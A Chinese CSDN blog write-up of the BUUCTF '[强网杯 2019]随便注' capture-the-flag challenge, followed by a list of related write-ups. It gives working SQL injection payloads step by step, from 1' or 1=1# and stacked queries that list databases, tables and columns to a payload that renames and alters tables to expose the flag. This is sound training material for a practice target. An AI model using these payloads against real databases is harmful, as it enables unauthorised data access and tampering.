Buuctf-Web-[强网杯 2019]随便注

最新推荐文章于 2023-03-02 19:58:19 发布
最新推荐文章于 2023-03-02 19:58:19 发布
阅读量245 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: 数据库 安全 web安全 php
本文链接:https://blog.csdn.net/kengkeng123qwe/article/details/124748157
版权

前言

刷题网址:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8

首先打开就是SQL注入,我们尝试一下,如下图,发现返回的是原始数据

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6AlAXwZn-1652411712053)(/images/wordimage/2022/0513/injection.png)]

然后我们输入1' or 1=1#发现返回了所有数据,如下图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t5qsDXrP-1652411712054)(/images/wordimage/2022/0513/or11.png)]

这里我们直接来使用联合注入尝试,发现order by 2正常回显,但是order by 3就报错

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6tGZxjnZ-1652411712055)(/images/wordimage/2022/0513/orderby2.png)]

这里我们查询,发现过滤了很多关键字。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CYHGH9ta-1652411712055)(/images/wordimage/2022/0513/union.png)]

这里可以选择尝试堆叠注入,如下图,发现是可以进行堆叠注入的,并且把所有的数据库都爆出来了。

payload: 1';show databases;#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MAO1XIGK-1652411712055)(/images/wordimage/2022/0513/databases.png)]

然后这里我们查表,发现有两个表,一个是纯数字表一个是words表,如下图

payload: 1';show tables;#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-zsPElSvx-1652411712056)(/images/wordimage/2022/0513/twotables.png)]

我们查看数字表,如下图,发现flag在里面,然后反单引号(`)是数据库、表、索引、列和别名用的引用符,但是这里经过测试,如果是纯数字的表就需要加反单引号,如果不是就不需要加或者加上也无所谓。

payload: 1';show columns from `1919810931114514`;#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BGAXVh6I-1652411712057)(/images/wordimage/2022/0513/duidie.png)]

然后我们在查看words表,如下图,看起来输入框里面默认查询的就是words表了,因为上面查询数字表的时候只有一列,查询words表的时候有两列,那么如果是这样的话猜测一下查询语句应该是: select id,data from words where id =

payload: 1';show columns from words;#

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VNxiv6o5-1652411712057)(/images/wordimage/2022/0513/words.png)]

如果是这样,而且还没有过滤renamealter思路就来了,就是把words表改成words1或者其他名字,然后在把数字表名改成words,然后在把新的words里面的flag修改成id,然后在结合上面的1' or 1=1#就可以查出flag了。

payload: 1';rename table words to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;desc words;#

如下图flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pVkOMRuw-1652411712058)(/images/wordimage/2022/0513/flagdui.png)]

御七彩虹猫
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1260
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
BUUCTF-web-随便
nareku的博客
07-06 1136
输入1试试,可以看到是GET传参 判断一下是数字型入还是字符型入 可以看出来是字符型入了,接下来就是常规猜解SQL查询语句中的字段数输入 : 1' order by 1# 输入: 1' order by 2#输入: 1' order by 3# 说明字段数为2 常规使用联合查询输入: 1' union select 1,2# 发现一些常用的查询关键词都被过滤了捏,但是堆叠查询入貌似没有,试试堆叠查询入输入: 1' ; show databases;#说明堆叠查询入可行输入: -1' ;
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2367
buuctf强网杯2019为例的堆叠
BUUCTFWeb随便(SQL入)
qq_70434663的博客
03-02 497
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL入。第一步,测试入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF部分web题目
最新发布
05-06
写题记录
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF WEB 随便
guishengyx的博客
10-18 170
题目是入,于是尝试SQL入 order by 2得到两个字段 尝试联合查询时发现禁用了select 百度了解到堆叠查询 用;将语句隔开 发现可以使用堆叠入 继续查询表名 查询表中的字段名 0';show columns from words;-- qwe 查询1919810931114514表的时候出现了问题 百度了解到数字表名需要用反引号``括起来 0';show columns from `1919810931114514`;-- asd ...
BUUCTF web 随便 sql入 mysql预处理语句
m0_46412682的博客
08-01 382
BUUCTF web 随便 sql入 mysql预处理语句 开始的页面 查询1 按照手工检测sql入点步骤 1、判断入点 1' or 1=1# 1' or 1=2# 两次结果不一样,说明存在sql入 2、判断有多少字段 1' order by 3#返回错误 1' order by 2#正常,说明有2个字段 3、查询数据库 -1' union select 1,database()# 这里过滤了很多关键字,不能用select,update之类的关键字, 4、堆叠入 在sql中,分号;是用来
BUUCTF-Web-随便(堆叠入)
m0_46315342的博客
08-12 371
这里转载一个大佬的博客: 作者:简简的我 链接:https://www.jianshu.com/p/36f0772f5ce8 来源:简书 然后我简单说一下这个题目吧,这是个sql入的题目,过滤了select这样的关键字,双写和大小写以及空格都不能进行绕过,所以这里使用的是堆叠入。 这个作者讲了三种方法,但是第三种好像有点难,第一种和第二种是比较容易接受的。主要是学习一下堆叠入的语法吧,和sql有点点不一样。然后第二种方法里面作者还讲了一下预处理语句,感觉很牛逼。 ...
SQL Injection8(堆叠入)——强网杯2019随便
热门推荐
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
强网杯2019-web-随便
wyj_1216 House
02-05 1950
题目 writeup 首先根据题目意思,知道是SQL入 尝试进行入 ?inject=1 1' 发现报错,想到利用#进行截断(释掉) 1' # 回显正常 1' and 1=1# 1' and 1=2# 发现没有回显 判断字段数 1' order by 1# 1' order by 2# 1' order by 3# 到3时报错,故知字段数为2 尝试union联...
BUUCTF-WEB:[强网杯 2019]随便 1
_Co1a
01-24 950
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试入: 解题思路: 1、先尝试用union联合入:第一步、测试入点(一些小tips:利用引号,and 1=1, or 1=1之类的)判断是字符型还是数字型 1' [error] 1'# [不报错,正常回显] 1' and 1=1# ...
[原题复现]2019强网杯WEB-随便
笑花大王
02-06 643
HCTF 2018 Warmup 原题复现:https://gitee.com/xiaohua1998/qwb_2019_supersqli 考察知识点:SQL入漏洞-堆叠入 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 做题过程 打开页面测试入点 //判断入点 存在入! ' and 1...
BUUCTF WEB [强网杯 2019]高明的黑客
A_dmin的博客
12-15 2348
BUUCTF WEB [强网杯 2019]高明的黑客 打开网页,发现有提示~~源码可下 下载源码,发现3002个文件,查看一下,发现有不少的shell??? 不过都是不能用的,其实这道题目就是让我们找到能用的shell,考察的应该是脚本的编写能力吧!! 源码已经down下来了,在本地搭一个环境,php 7.0以上,否则会报语法错误! 然后编写脚本(特别慢): import requests ...
BUUCTFWEB-WarmUp
迷风小白
06-25 1万+
拿到题目,一个表情包,顺便扫一下目录
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值